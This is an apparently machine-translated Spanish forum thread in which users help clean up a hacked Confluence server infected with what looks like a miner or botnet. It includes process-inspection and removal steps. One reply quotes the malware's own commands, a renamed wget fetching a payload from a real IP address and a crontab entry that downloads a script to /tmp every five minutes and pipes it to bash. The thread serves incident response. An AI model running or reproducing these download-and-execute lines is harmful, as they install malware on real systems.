Su servidor parece pirateado. Mire detenidamente la lista de procesos. ejecutar ps auxc y eche un vistazo a las fuentes binarias de procesos.
Puede usar herramientas como rkhunter para escanear su servidor pero, en general, al principio debe eliminar todo lo que se ha iniciado como usuario de confluencia, escanear su servidor/cuenta, actualizar su confluencia (en la mayoría de los casos, fuente de ataque determinada por el usuario) y buscar en su confluencia para cuentas adicionales, etc.
Si desea ver qué hay en ese proceso, eche un vistazo a /proc, p. en ls -la /proc/996 . Verá el código fuente binario allí también. También puedes almorzar strace -ff -p 996 para ver qué proceso está haciendo o cat /proc/996/exe | strings para ver qué cadenas tiene ese binario. Esto es probablemente algún tipo de pieza de botnet, minero, etc.
Tuve el mismo problema, fue pirateado, la secuencia de comandos del virus estaba en / tmp, busque el nombre de la secuencia de comandos del comando "superior" (letras insignificantes, el nombre de "fcbk6hj" era mío) y elimine los procesos (tal vez 3 procesos)
raíz 3158 1 0 15:18 ? 00:00:01 ./fcbk6hj ./jd8CKglroot 3159 1 0 15:18 ? 00:00:01 ./fcbk6hj ./5CDocHlroot 3160 1 0 15:18 ? 00:00:11 ./fcbk6hj ./prot
elimínelos a todos y elimine /tmp/prot, y elimine el proceso de /boot/vmlinuz, la CPU vuelve.
Descubrí que el virus había descargado el script a /tmp automáticamente, mi método era mv wgetak a otro nombre.
Comportamiento del virus:wgetak -q http://51.38.133.232:80/86su.jpg -O ./KC5GkAo
encontró que la siguiente tarea fue escrita en crontab, simplemente bórrela:*/5 * * * * /usr/bin/wgetak -q -O /tmp/seasame http://51.38.133.232:80 &&bash /tmp/seasame
Después de eliminar esto del sistema y crontab, tal vez sea una buena idea (al menos por ahora) agregar el usuario de confluencia a /etc/cron.deny .
Y después:
$ crontab -e
You (confluence) are not allowed to use this program (crontab)
See crontab(1) for more information